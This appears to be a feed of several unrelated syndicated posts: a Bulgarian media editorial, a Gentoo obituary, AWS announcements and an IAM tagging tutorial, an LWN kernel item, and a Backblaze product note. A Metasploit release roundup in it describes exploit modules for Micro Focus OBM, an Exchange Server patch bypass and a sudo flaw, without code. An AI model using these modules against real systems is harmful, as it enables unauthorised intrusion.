Седмицата в „Тоест“ (8–12 февруари)

Post Syndicated from Тоест original https://toest.bg/editorial-8-12-february-2021/

Тази власт беше обида за националното ни достойнство и трябва да намерим начин да изкупим вината си, че сме я избрали и търпели толкова време!

Светла Енчева

Цитатът е на журналиста Стойко Тонев, по-известен с псевдонима си Тони Филипов, д-р, който почина на 31 януари т.г. През седмицата неговите колеги от сайта reduta.bg оповестиха решението си да поставят точка на съвместното им начинание. „Редута“ ще липсва на мнозина. На сбогуване Светла Енчева припомня защо този сайт беше своеобразно укрепление срещу посредствеността и премълчаването. А ние от „Тоест“ се спряхме на цитата в началото, за да напомним, че вината на избирателите се трупа или изкупува на избори. Каквито наближават.


Емилия Милчева

И докато обсъждаме изборите, Емилия Милчева обръща внимание на явлението гражданска квота – тоест онези имена, които партиите вмъкват измежду своите послушковци в стремеж да добавят „цвят и аромат“ в блудкавото меню, преди да го сервират на избирателите си. Специална селекция формално безпартийни, които обаче „също са склонни да мърдат с уши, за радост на публиката, и да споделят храната в чинията си с когото им наредят партиите“.


Венелина Попова

Седмичният вътрешнополитически коментар на Венелина Попова също е посветен на изборна тема, а именно очерталите се вече нови предизборни коалиции. Малко от тях изглеждат сформирани на база принципи или идеологическа основа. Повечето са опортюнистични и поне засега обещават повече интриги, отколкото решения за важните проблеми пред България.


Марин Бодаков

Марин Бодаков не приема очевидните обяснения на ситуацията, в която живеем, давани от обичайните заподозрени политолози, социолози, икономисти, публицисти и др. Затова потърси за разговор психоаналитика д-р Светлозар Василев. Дали приемането на провала е един от възможните начини за деескалиране на нарцисизма и омразата – прочетете в интервюто, озаглавено „Не сме центърът на вселената“.


Време е за рубриката „По буквите“ и новите препоръки на Марин за книги, на които си струва да обърнете внимание. Този път това са „Мъжът с червеното палто“ от Джулиан Барнс, „Флъш“ от Вирджиния Улф и „Трилогия. Бдение. Бленуванията на Улав. Отмала“ от Юн Фосе.


Нева Мичева

Нека завършим броя с един разговор за това как разпознаваме истинското приятелство. Разбира се, под формата на отговор на читателско писмо в рубриката „Говори с Нева“. „Приятелството е един от основните човешки таланти и един от ключовите ни шансове за оцеляване“, обобщава Нева Мичева, но преди това предлага да прочетем дефинициите на нейни приятели за приятелството. И да разгледаме табелките по няколко нюйоркски пейки.

Запазете се здрави и до следващата събота!

Тоест“ разчита единствено на финансовата подкрепа на читателите си.

Gentoo mourns the loss of Kent Fredric

Post Syndicated from original https://lwn.net/Articles/846054/rss

A brief
post
on the Gentoo site is in memory of Kent “kent\n” Frederic.
Kent was an active member of the Gentoo community for many years. He tirelessly managed Gentoo’s Perl support, and was active in the Rust project as well as in many other corners. We all remember him as an enthusiastic, bright person, with lots of eye for detail and constant willingness to help out and improve things. On behalf of the world-wide Gentoo community, our heartfelt condolences go out to his family and friends.

Medieval Security Techniques

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/02/medieval-security-techniques.html

Sonja Drummer describes (with photographs) two medieval security techniques. The first is a for authentication: a document has been cut in half with an irregular pattern, so that the two halves can be brought together to prove authenticity. The second is for integrity: hashed lines written above and below a block of text ensure that no one can add additional text at a later date.

Architecture Monthly Magazine: Manufacturing

Post Syndicated from Jane Scolieri original https://aws.amazon.com/blogs/architecture/architecture-monthly-magazine-manufacturing/

Architecture Monthly Magazine - Manufacturing

How is operational data being used to transform manufacturing? Steve Blackwell, AWS Worldwide Tech Leader for manufacturing, speaks about considerations for architecting for manufacturing, considerations for Industry 4.0 applications and data, and AWS for Industrial.

We hope you’ll find this edition of Architecture Monthly useful. My team would like your feedback, so please give us a rating and include your comments on the Amazon Kindle page. You can view past issues and reach out to [email protected] anytime with your questions and comments.

In this month’s Manufacturing issue:

  • Ask an Expert: Steve Blackwell, Tech Leader, Manufacturing, AWS
  • Case Study: Amazon Prime Air’s Drone Takes Flight with AWS and Siemens
  • Reference Architecture: PTC Windchill Product Lifecycle Management on AWS
  • Blog: How Genie® (a Terex® brand) improved paint quality using AWS IoT SiteWise
  • Solution: Amazon Virtual Andon
  • Whitepaper: Achieve Production Optimization with AWS Machine Learning
  • Reference Architecture: OSIsoft PI System Enterprise Data Infrastructure on AWS
  • Blog: AWS for Industrial – Making it easy for customers to scale their industrial
    workloads on AWS
  • Case Study: Arneg Predicts Customer Maintenance Needs Worldwide Using Amazon
    Forecast and Amazon SageMaker
  • Related Videos: Driving Predictive Quality with Machine Connectivity, AWS Knows
    Industrial Operations

Download the Magazine

How to access the magazine

View and download past issues as PDFs on the AWS Architecture Monthly webpage.
Readers in the US, UK, Germany, and France can subscribe to the Kindle version of the magazine at Kindle Newsstand.
Visit Flipboard, a personalized mobile magazine app that you can also read on your computer.
We hope you’re enjoying Architecture Monthly, and we’d like to hear from you—leave us star rating and comment on the Amazon Kindle Newsstand page or contact us anytime at [email protected].

Metasploit Wrap-Up

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/02/12/metasploit-wrap-up-98/

MicroFocus? More like MacroVuln

Metasploit Wrap-Up

MicroFocus’s Operations Bridge Manager is a security information and event management (SIEM) tool designed to collect and parse security logs from multiple disparate sources. OBM has a large attack surface—something Pedro Ribeiro was able to take advantage of with his new RCE module. This module leverages a Java deserialization bug to allow payload execution as either root or SYSTEM, depending on the victim OS.

We’ve one other OBM module currently in the process of being landed, but for anyone who needs their fix of MicroFocus hacks right away, we’d recommend pedrib’s super detailed writeup of his findings.

Patches? We don’t need no stinkin’ patches!

While PR #14607 doesn’t add a totally new exploit for Microsoft Exchange Server, that’s only because zeroSteiner was able to update an earlier module to support a bypass for the patch that was supposed to fix the vuln it exploited.

CVE-2020-16875 originally allowed remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server so long as they were authenticated as a user who had an active mailbox and who was assigned the Data Loss Prevention role. This was believed to have been patched in the Exchange Server 2016 Cumulative Update 18 (September 15 2020) and Exchange Server 2019 Cumulative Update 7 (September 15 2020). However, this patch was later bypassed and assigned CVE-2020-17132. Microsoft’s second patch was also later bypassed—a tough shake for organizations’ patch cycles. Both the original vulnerability and the patch bypass) were discovered by Steven Seeley, and the Metasploit code is based on his work.

zeroSteiner’s changes allow the exchange_ecp_dlp_policy module to exploit the two patched versions of Exchange Server and the unpatched server.

External modules, internal quality

Last but not least, cgranleese-r7 has spearheaded our efforts to improve usability of Metasploit’s external modules by providing more informative error messages for users when they lack the required languages in their environment (#14480). This will help avoid instances of users missing out on useful modules due to their not knowing some languages outside of ruby can be needed for the full metasploit experience.

msf6 > use auxiliary/scanner/msmail/host_id
[-] Failed to load module: LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
msf6 >

New modules (1)

  • Micro Focus Operations Bridge Manager Authenticated Remote Code Execution by Pedro Ribeiro, which exploits ZDI-20-1327 / CVE-2020-11853 This adds an exploit module that leverages an insecure Java deserialization vulnerability in multiple Micro Focus products. This allows remote code execution as the root user on Linux or the SYSTEM user on Windows. Initial authentication is required, but any low-privileged user can be used to successfully run this exploit.

Enhancements and features

  • #14154 from cgranleese-r7 This ensures that all modules that previously used manual AutoCheck behavior now leverage the AutoCheck mixin instead.
  • #14480 from cgranleese-r7 Improves the handling of external modules when they’re missing runtime dependencies and gives the user a more useful error. It will now return which runtime language the user is missing on their environment (this has been implemented for both Python and Go).
  • #14607 from zeroSteiner This updates the Exchange ECP DLP Policy module exploit to leverage a new technique that bypasses the original patch. This new technique also works on unpatched versions.
  • #14669 from jmartin-r7 Improves error message feedback when using the auxiliary/analyze/crack_* modules. Examples include notifying the user that the database needs to be active, and having JohnTheRipper Jumbo patch installed
  • #14685 from geyslan Reduced the size of the linux/x64/shell_bind_tcp_random_port payload while maintaining the functionality.
  • #14708 from timwr Add offsets to the exploit/osx/browser/safari_proxy_object_type_confusion exploit module for Mac OSX 10.13.1 and 10.13.2.
  • #14721 from bcoles This adds a target for Debian 10 to the sudo exploit CVE-2021-3156.
  • #14728 from FireFart Updates have been made to lib/msf/core/module/reference.rb as well as associated tools and documentation to update old WPVDB links with the new WPVDB domain and to also ensure that the new URL format is properly checked in the respective tools.
  • #14725 by h00die moves creds to a default-cred "userpass" list instead of splitting known cred pairs across files.

Bugs fixed

  • #14714 from adfoster-r7 Updates the sqlite gem in preparation for Ruby 3.0 support & fixes SQLite3 deprecation warning.
  • #14720 from dwelch-r7 Fixed an issue in the lib/msf/core/exploit/remote/http_client.rb and lib/msf/core/opt_http_rhost_url.rb libraries where the VHOST datastore variable would be set incorrectly if a user used an /etc/hosts entry for resolving a hostname to an IP address.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Opt-in to the new Amazon SES console experience

Post Syndicated from Simon Poile original https://aws.amazon.com/blogs/messaging-and-targeting/amazon-ses-console-opt-in/

Amazon Web Services (AWS) is pleased to announce the launch of the newly redesigned Amazon Simple Email Service (SES) console. With its streamlined look and feel, the new console makes it even easier for customers to leverage the speed, reliability, and flexibility that Amazon SES has to offer. Customers can access the new console experience via an opt-in link on the classic console.

Amazon SES now offers a new, optimized console to provide customers with a simpler, more intuitive way to create and manage their resources, collect sending activity data, and monitor reputation health. It also has a more robust set of configuration options and new features and functionality not previously available in the classic console.

Here are a few of the improvements customers can find in the new Amazon SES console:

Verified identities

Streamlines how customers manage their sender identities in Amazon SES. This is done by replacing the classic console’s identity management section with verified identities. Verified identities are a centralized place in which customers can view, create, and configure both domain and email address identities on one page. Other notable improvements include:

  • DKIM-based verification
    DKIM-based domain verification replaces the previous verification method which was based on TXT records. DomainKeys Identified Mail (DKIM) is an email authentication mechanism that receiving mail servers use to validate email. This new verification method offers customers the added benefit of enhancing their deliverability with DKIM-compliant email providers, and helping them achieve compliance with DMARC (Domain-based Message Authentication, Reporting and Conformance).
  • Amazon SES mailbox simulator
    The new mailbox simulator makes it significantly easier for customers to test how their applications handle different email sending scenarios. From a dropdown, customers select which scenario they’d like to simulate. Scenario options include bounces, complaints, and automatic out-of-office responses. The mailbox simulator provides customers with a safe environment in which to test their email sending capabilities.

Configuration sets

The new console makes it easier for customers to experience the benefits of using configuration sets. Configuration sets enable customers to capture and publish event data for specific segments of their email sending program. It also isolates IP reputation by segment by assigning dedicated IP pools. With a wider range of configuration options, such as reputation tracking and custom suppression options, customers get even more out of this powerful feature.

  • Default configuration set
    One important feature to highlight is the introduction of the default configuration set. By assigning a default configuration set to an identity, customers ensure that the assigned configuration set is always applied to messages sent from that identity at the time of sending. This enables customers to associate a dedicated IP pool or set up event publishing for an identity without having to modify their email headers.

Account dashboard

There is also an account dashboard for the new SES console. This feature provides customers with fast access to key information about their account, including sending limits and restrictions, and overall account health. A visual representation of the customer’s daily email usage helps them ensure that they aren’t approaching their sending limits. Additionally, customers who use the Amazon SES SMTP interface to send emails can visit the account dashboard to obtain or update their SMTP credentials.

Reputation metrics

The new reputation metrics page provides customers with high-level insight into historic bounce and complaint rates. This is viewed at both the account level and the configuration set level. Bounce and complaint rates are two important metrics that Amazon SES considers when assessing a customer’s sender reputation, as well as the overall health of their account.

The redesigned Amazon SES console, with its easy-to-use workflows, will not only enhance the customers’ on-boarding experience, it will also change the paradigms used for their on-going usage. The Amazon SES team remains committed to investing on behalf of our customers and empowering them to be productive anywhere, anytime. We invite you to opt in to the new Amazon SES console experience and let us know what you think.

Use tags to manage and secure access to additional types of IAM resources

Post Syndicated from Michael Switzer original https://aws.amazon.com/blogs/security/use-tags-to-manage-and-secure-access-to-additional-types-of-iam-resources/

AWS Identity and Access Management (IAM) now enables Amazon Web Services (AWS) administrators to use tags to manage and secure access to more types of IAM resources, such as customer managed IAM policies, Security Assertion Markup Language (SAML) providers, and virtual multi-factor authentication (MFA) devices. A tag is an attribute that consists of a key and an optional value that you can attach to an AWS resource. With this launch, administrators can attach tags to additional IAM resources to identify resource owners and grant fine-grained access to these resources at scale using attribute-based access control. For example, a security administrator in an AWS organization can now attach tags to all customer managed policies and then create a single policy for local administrators within the member accounts, which grants them permissions to manage only those customer managed policies that have a matching tag.

In this post, I first discuss the additional IAM resources that now support tags. Then I walk you through two use cases that demonstrate how you can use tags to identify an IAM resource owner, and how you can further restrict access to AWS resources based on prefixes and tag values.

Which IAM resources now support tags?

In addition to IAM roles and IAM users that already support tags, you can now tag more types of IAM resources. The following table shows other IAM resources that now support tags. The table also highlights which of the IAM resources support tags on the IAM console level and at the API/CLI level.

IAM resources Support tagging at IAM console Support tagging at API and CLI level
Customer managed IAM policies Yes Yes
Instance profiles No Yes
OpenID Connect Provider Yes Yes
SAML providers Yes Yes
Server certificates No Yes
Virtual MFAs No Yes

Fine-grained resource ownership and access using tags

In the next sections, I will walk through two examples of how to use tagging to classify your IAM resources and define least-privileged access for your developers. In the first example, I explain how to use tags to allow your developers to declare ownership of a customer managed policy they create. In the second example, I explain how to use tags to enforce least privilege allowing developers to only pass IAM roles with Amazon Elastic Compute Cloud (Amazon EC2) instance profiles they create.

Example 1: Use tags to identify the owner of a customer managed policy

As an AWS administrator, you can require your developers to always tag the customer managed policies they create. You can then use the tag to identify which of your developers owns the customer managed policies.

For example, as an AWS administrator you can require that your developers in your organization to tag any customer managed policy they create. To achieve this, you can require the policy creator to enter their username as the value for the key titled Owner on resource tag creation. By enforcing tagging on customer managed policies, administrators can now easily identify the owner of these IAM policy types.

To enforce customer managed policy tagging, you first grant your developer the ability to create IAM customer managed policies, and include a conditional statement within the IAM policy that requires your developer to apply their AWS user name in the tag value field titled Owner when they create the policy.

Step 1: Create an IAM policy and attach it to your developer role

Following is a sample IAM policy (TagCustomerManagedPolicies.json) that you can assign to your developer. You can use this policy to follow along with this example in your own AWS account. For your own policies and commands, replace the instances of <AccountNumber> in this example with your own AWS account ID.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "TagCustomerManagedPolicies",
            "Effect": "Allow",
            "Action": [
                "iam:CreatePolicy",
                "iam:TagPolicy"
            ],
            "Resource": "arn:aws:iam::: <AccountNumber>:policy/Developer-*",
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/Owner": "${aws:username}"
                }
            }
        }
    ]
} 

This policy requires the developer to enter their AWS user name as the tag value to declare AWS resource ownership during customer managed policy creation. The TagCustomerManagedPolicies.json also requires the developer to name any customer managed policy they create with the Developer- prefix.

Create the TagCustomerManagedPolicies.json file, then create a managed policy using the the following CLI command:

$aws iam create-policy --policy-name TagCustomerManagedPolicies --policy-document file://TagCustomerManagedPolicies.json

When you create the TagCustomerManagedPolicies.json policy, attach the policy to your developer with the following command. Assume your developer has an IAM user profile and their AWS user name is JohnA.

$aws iam attach-user-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/TagCustomerManagedPolicies --user-name JohnA

Step 2: Ensure the developer uses appropriate tags when creating IAM policies

If your developer attempts to create a customer managed policy without applying their AWS user name as the value for the Owner tag and fails to name the customer managed policy with the required prefix Developer-, this IAM policy will not allow the developer to create this AWS resource. The error received by the developer is shown in the following example.

$ aws iam create-policy --policy-name TestPolicy --policy-document file://Developer-TestPolicy.json 

An error occurred (AccessDenied) when calling the CreatePolicy operation: User: arn:aws:iam::<AccountNumber>:user/JohnA is not authorized to perform: iam:CreatePolicy on resource: policy TestPolicy

However, if your developer applies their AWS user name as the value for the Owner tag and names the policy with the Developer- prefix, the IAM policy will enable your developer to successfully create the customer managed policy, as shown in the following example.

$aws iam create-policy --policy-name Developer-TestPolicy --policy-document file://Developer-TestPolicy.json --tags '{"Key": "Owner", "Value": "JohnA"}'

{
  "Policy": {
    "PolicyName": "Developer-Test_policy",
    "PolicyId": "<PolicyId>",
    "Arn": "arn:aws:iam::<AccountNumber>:policy/Developer-Test_policy",
    "Path": "/",
    "DefaultVersionId": "v1",
    "Tags": [
      {
        "Key": "Owner",
        "Value": "JohnA"
      }
    ],
    "AttachmentCount": 0,
    "PermissionsBoundaryUsageCount": 0,
    "IsAttachable": true,
    "CreateDate": "2020-07-27T21:18:10Z",
    "UpdateDate": "2020-07-27T21:18:10Z"
  }
}

Example 2: Use tags to control which IAM roles your developers attach to an instance profile

Amazon EC2 enables customers to run compute resources in the cloud. AWS developers use IAM instance profiles to associate IAM roles to EC2 instances hosting their applications. This instance profile is used to pass an IAM role to an EC2 instance to grant it privileges to invoke actions on behalf of an application hosted within it.

In this example, I show how you can use tags to control which IAM roles your developers can add to instance profiles. You can use this as a starting point for your own workloads, or follow along with this example as a learning exercise. For your own policies and commands, replace the instances of <AccountNumber> in this example with your own AWS account ID.

Let’s assume your developer is running an application on their EC2 instance that needs read and write permissions to objects within various developer owned Amazon Simple Storage Service (S3) buckets. To allow your application to perform these actions, you need to associate an IAM role with the required S3 permissions to an instance profile of your EC2 instance that is hosting your application.

To achieve this, you will do the following:

  1. Create a permissions boundary policy and require your developer to attach the permissions boundary policy to any IAM role they create. The permissions boundary policy defines the maximum permissions your developer can assign to any IAM role they create. For examples of how to use permissions boundary policies, see Add Tags to Manage Your AWS IAM Users and Roles.
  2. Grant your developer permissions to create and tag IAM roles and instance profiles. Your developer will use the instance profile to pass the IAM role to their EC2 instance hosting their application.
  3. Grant your developer permissions to create and apply IAM permissions to the IAM role they create.
  4. Grant your developer permissions to assign IAM roles to instance profiles of their EC2 instances based on the Owner tag they applied to the IAM role and instance profile they created.

Step 1: Create a permissions boundary policy

First, create the permissions boundary policy (S3ActionBoundary.json) that defines the maximum S3 permissions for the IAM role your developer creates. Following is an example of a permissions boundary policy.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "S3ActionBoundary",
            "Effect": "Allow",
            "Action": [
                "S3:CreateBucket",
                "S3:ListAllMyBuckets",
                "S3:GetBucketLocation",
                "S3:PutObject",
                "S3:PutObjectAcl"
            ],
            "Resource": "arn:aws:s3:::Developer-*",
            "Condition": {
                "StringEquals": {
                    "aws:RequestedRegion": "us-east-1"
                }
            }
        }
    ]
}

When used as a permissions boundary, this policy enables your developers to grant permissions to some S3 actions, as long as two requirements are met. First, the S3 bucket must begin with the Developer prefix. Second, the region used to make the request must be US East (N. Virginia).

Similar to the previous example, you can create the S3ActionBoundary.json, then create a managed IAM policy using the following CLI command:

$aws iam create-policy --policy-name S3ActionBoundary --policy-document file://S3ActionBoundary.json

Step 2: Grant your developer permissions to create and tag IAM roles and instance profiles

Next, create the IAM permission (DeveloperCreateActions.json) that allows your developer to create IAM roles and instance profiles. Any roles they create will not be allowed to exceed the permissions of the boundary policy we created in step 1, and any resources they create must be tagged according to the guideline we established earlier. Following is an example DeveloperCreateActions.json policy.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "CreateRole",
            "Effect": "Allow",
            "Action": "iam:CreateRole",
            "Resource": "arn:aws:iam::<AccountNumber>:role/Developer-*",
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/Owner": "${aws:username}",
                    "iam:PermissionsBoundary": "arn:aws:iam::<AccountNumber>:policy/S3ActionBoundary"
                }
            }
        },
        {
            "Sid": "CreatePolicyandInstanceProfile",
            "Effect": "Allow",
            "Action": [
                "iam:CreateInstanceProfile",
                "iam:CreatePolicy"
            ],
            "Resource": [
                "arn:aws:iam::<AccountNumber>:instance-profile/Developer-*",
                "arn:aws:iam::<AccountNumber>:policy/Developer-*"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/Owner": "${aws:username}"
                }
            }
        },
        {
            "Sid": "TagActionsAndAttachActions",
            "Effect": "Allow",
            "Action": [
                "iam:TagInstanceProfile",
                "iam:TagPolicy",
                "iam:AttachRolePolicy",
                "iam:TagRole"
            ],
            "Resource": [
                "arn:aws:iam::<AccountNumber>:instance-profile/Developer-*",
                "arn:aws:iam::<AccountNumber>:policy/Developer-*",
                "arn:aws:iam::<AccountNumber>:role/Developer-*"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:ResourceTag/Owner": "${aws:username}"
                }
            }
        }
    ]
}

I will walk through each statement in the policy to explain its function.

The first statement CreateRole allows creating IAM roles. The Condition element of the policy requires your developer to apply their AWS user name as the Owner tag to any IAM role or instance profile they create. It also requires your developer to attach the S3ActionBoundary as a permissions boundary policy to any IAM role they create.

The next statement CreatePolicyAndInstanceProfile allows creating IAM policies and instance profiles. The Condition element requires your developer to name any IAM role or instance profile they create with the Developer- prefix, and to attach the Owner tag to the resources they create.

The last statement TagActionsAndAttachActions allows tagging managed policies, instance profiles and roles with the Owner tag. It also allows attaching role policies, so they can configure the permissions for the roles they create. The Resource and Condition elements of the policy require the developer to use the Developer- prefix and their AWS user name as the Owner tag, respectively.

Once you create the DeveloperCreateActions.json file locally, you can create it as an IAM policy and attach it to your developer role using the following CLI commands:

$aws iam create-policy --policy-name DeveloperCreateActions --policy-document file://DeveloperCreateActions.json 

$aws iam attach-user-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/DeveloperCreateActions --user-name JohnA

With the preceding policy, your developer can now create an instance profile, an IAM role, and the permissions they will attach to the IAM role. For example, if your developer creates an instance profile and doesn’t apply their AWS user name as the Owner tag, the IAM Policy will prevent the resource creation process from occurring render an error as shown in the following example.

$aws iam create-instance-profile --instance-profile-name Developer-EC2-InstanceProfile

An error occurred (AccessDenied) when calling the CreateInstanceProfile operation: User: arn:aws:iam::<AccountNumber>:user/JohnA is not authorized to perform: iam:CreateInstanceProfile on resource: arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2

When your developer names the instance profile with the prefix Developer- and includes their AWS user name as value for the Owner tag in the create request, the IAM policy allows the create action to occur as shown in the following example.

$aws iam create-instance-profile --instance-profile-name Developer-EC2-InstanceProfile --tags '{"Key": "Owner", "Value": "JohnA"}'

{
    "InstanceProfile": {
        "Path": "/",
        "InstanceProfileName":"Developer-EC2-InstanceProfile",
        "InstanceProfileId":" AIPAR3HKUNWB24NBA3HRC",
        "Arn": "arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile",
        "CreateDate": "2020-07-30T21:24:30Z",
        "Roles": [],
        "Tags": [
            {
                "Key": "Owner",
                "Value": "JohnA"
            }
        ]

    }
}

Let’s assume your developer creates an IAM role called Developer-EC2. The Developer-EC2 role has your developer’s AWS user name (JohnA) as the Owner tag. The developer has the S3ActionBoundaryPolicy.json as their permissions boundary policy and the Developer-ApplicationS3Access.json policy as the permissions policy that your developer will pass to their EC2 instance to allow it to call S3 on behalf of their application. This is shown in the following example.

<Details of the role trust policy – RoleTrustPolicy.json>
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "ec2.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
<Details of IAM role permissions – Developer-ApplicationS3Access.json>

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "S3Access",
            "Effect": "Allow",
            "Action": [
                "S3:GetBucketLocation",
                "S3:PutObject",
                "S3:PutObjectAcl"
            ],
            "Resource": "arn:aws:s3:::Developer-*"
        }
    ]
}

<Your developer creates IAM role with a permissions boundary policy and a role trust policy>

$aws iam create-role --role-name Developer-EC2
--assume-role-policy-document file://RoleTrustPolicy.json
--permissions-boundary arn:aws:iam::<AccountNumber>:policy/S3ActionBoundary --tags '{"Key": "Owner", "Value": "JohnA"}'


<Your developer creates IAM policy for the newly created IAM role>
$aws iam create-policy –-policy-name Developer-ApplicationS3Access –-policy-document file://Developer-ApplicationS3Access.json --tags '{"Key": "Owner", "Value": "JohnA"}'

<Your developer attaches newly created IAM policy to the newly created IAM role >
$aws iam attach-role-policy --policy-arn arn:aws:iam::<AccountNumber>:policy/Developer-ApplicationS3Access --role-name Developer-EC2

Step 3: Grant your developer permissions to create and apply IAM permissions to the IAM role they create

By using the AddRoleAssociateInstanceProfile.json IAM Policy provided below, you are allowing your developers the permissions to pass their new IAM role to an instance profile they create. They need to follow these requirements because the DeveloperCreateActions.json permission, which you already assigned to your developer in an earlier step, allows your developer to only administer resources that are properly prefixed with Developer- and have their user name assigned to the resource tag. The following example shows details of the AddRoleAssociateInstanceProfile.json policy.

< AddRoleAssociateInstanceProfile.json>
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AddRoleToInstanceProfile",
            "Effect": "Allow",
            "Action": [
                "iam:AddRoleToInstanceProfile",
                "iam:PassRole"
            ],
            "Resource": [
                "arn:aws:iam::<AccountNumber>:instance-profile/Developer-*",
                "arn:aws:iam::<AccountNumber>:role/Developer-*"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:ResourceTag/Owner": "${aws:username}"
                }
            }
        },
        {
            "Sid": "AssociateInstanceProfile",
            "Effect": "Allow",
            "Action": "ec2:AssociateIamInstanceProfile",
            "Resource": "arn:aws:ec2:us-east-1:<AccountNumber>:instance/Developer-*"
        }
    ]
}

Once you create the DeveloperCreateActions.json file locally, you can create it as an IAM policy and attach it to your developer role using the following CLI commands:

$aws iam create-policy –-policy-name AddRoleAssociateInstanceProfile –-policy-document file://AddRoleAssociateInstanceProfile.json

$aws iam attach-user-policy –-policy-arn arn:aws:iam::<AccountNumber>:policy/ AddRoleAssociateInstanceProfile –-user-name Developer

If your developer’s AWS user name is the Owner tag for the Developer-EC2-InstanceProfile instance profile and the Developer-EC2 IAM role, then AWS allows your developer to add the Developer-EC2 role to the Developer-EC2-InstanceProfile instance profile. However, if your developer attempts to add the Developer-EC2 role to an instance profile they don’t own, AWS won’t allow the action, as shown in the following example.

aws iam add-role-to-instance-profile --instance-profile-name EC2-access-Profile --role-name Developer-EC2

An error occurred (AccessDenied) when calling the AddRoleToInstanceProfile operation: User: arn:aws:iam::<AccountNumber>:user/Developer is not authorized to perform: iam:AddRoleToInstanceProfile on resource: instance profile EC2-access-profile

When your developer adds the IAM role to the instance profile they own, the IAM policy allows the action, as shown in the following example.

aws iam add-role-to-instance-profile --instance-profile-name Developer-EC2-InstanceProfile --role-name Developer-EC2

You can verify this by checking which instance profiles contain the Developer-EC2 role, as follows.

$aws iam list-instance-profiles-for-role --role-name Developer-EC2


<Result>
{
    "InstanceProfiles": [
        {
            "InstanceProfileId": "AIDGPMS9RO4H3FEXAMPLE",
            "Roles": [
                {
                    "AssumeRolePolicyDocument": "<URL-encoded-JSON>",
                    "RoleId": "AIDACKCEVSQ6C2EXAMPLE",
                    "CreateDate": "2020-06-07T20: 42: 15Z",
                    "RoleName": "Developer-EC2",
                    "Path": "/",
                    "Arn":"arn:aws:iam::<AccountNumber>:role/Developer-EC2"
                }
            ],
            "CreateDate":"2020-06-07T21:05:24Z",
            "InstanceProfileName":"Developer-EC2-InstanceProfile",
            "Path": "/",
            "Arn":"arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile"
        }
    ]
}

Step 4: Grant your developer permissions to add IAM roles to instance profiles based on the Owner tag

Your developer can then associate the instance profile (Developer-EC2-InstanceProfile) to their EC2 instance running their application, by using the following command.

aws ec2 associate-iam-instance-profile --instance-id i-1234567890EXAMPLE --iam-instance-profile Name="Developer-EC2-InstanceProfile"

{
    "IamInstanceProfileAssociation": {
        "InstanceId": "i-1234567890EXAMPLE",
        "State": "associating",
        "AssociationId": "iip-assoc-0dbd8529a48294120",
        "IamInstanceProfile": {
            "Id": "AIDGPMS9RO4H3FEXAMPLE",
            "Arn": "arn:aws:iam::<AccountNumber>:instance-profile/Developer-EC2-InstanceProfile"
        }
    }
}

Summary

You can use tags to manage and secure access to IAM resources such as IAM roles, IAM users, SAML providers, server certificates, and virtual MFAs. In this post, I highlighted two examples of how AWS administrators can use tags to grant access at scale to IAM resources such as customer managed policies and instance profiles. For more information about the IAM resources that support tagging, see the AWS Identity and Access Management (IAM) User Guide.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS IAM forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

 

Contributor

Special thanks to Derrick Oigiagbe who made significant contributions to this post.

[$] Introducing maple trees

Post Syndicated from original https://lwn.net/Articles/845507/rss

Seen from outside, the internals of the Linux kernel appear to be stable,
especially in subsystems like the memory-management subsystem. However,
from time to time, developers need to replace an internal
interface to solve a longstanding problem. One such
issue is contention on the lock used to protect essential
memory-management structures, including the page tables and virtual memory areas
(VMAs). Liam Howlett and Matthew Wilcox have been developing a new
data structure, called a “maple tree”, to replace the data structures
currently used for VMAs. This potentially big change in internal kernel
structures has been recently posted
for a review in a massive patch set.

On-prem to Cloud, Faster: Meet Our Newest Fireball

Post Syndicated from Jeremy Milk original https://www.backblaze.com/blog/on-prem-to-cloud-faster-meet-our-newest-fireball/

We’re determined to make moving data into cloud storage as easy as possible for you, so today we are releasing the latest improvement to our data migration pathways: a bigger, faster Backblaze Fireball.

The new Fireball increases capacity for the rapid ingest service from 70TB to 96TB and connectivity speed from 1 Gb/s to 10 Gb/s so that businesses can move larger data sets and media libraries from on-premises to the Backblaze Storage Cloud faster than before.

What Hasn’t Changed

The service is still drop-dead simple. Data is secure and encrypted during the transfer process, and you gain the benefits of the cloud without having to navigate the constraints (and sluggishness) of internet bandwidth. We’re still happy to send you two, or three, or more Fireballs as needed—you can order whatever you need right from your Backblaze B2 Cloud Storage account. Easy.

How It Works

The customer favorite (of folks like Austin City Limits and Yoga International) service works like this: We ship you the Fireball, you copy on-premises data to it directly or through the transfer tool of your choice, you send the Fireball back to us, and we quickly upload your data into your B2 Cloud Storage account.

The Fireball is not right for everyone—organizations already storing to public clouds now frequently use our cloud to cloud migration solution, while those with small, local data sets often find internet transfer tools more than sufficient. For a refresher, definitely check out this “Pathways to the Cloud” guide.

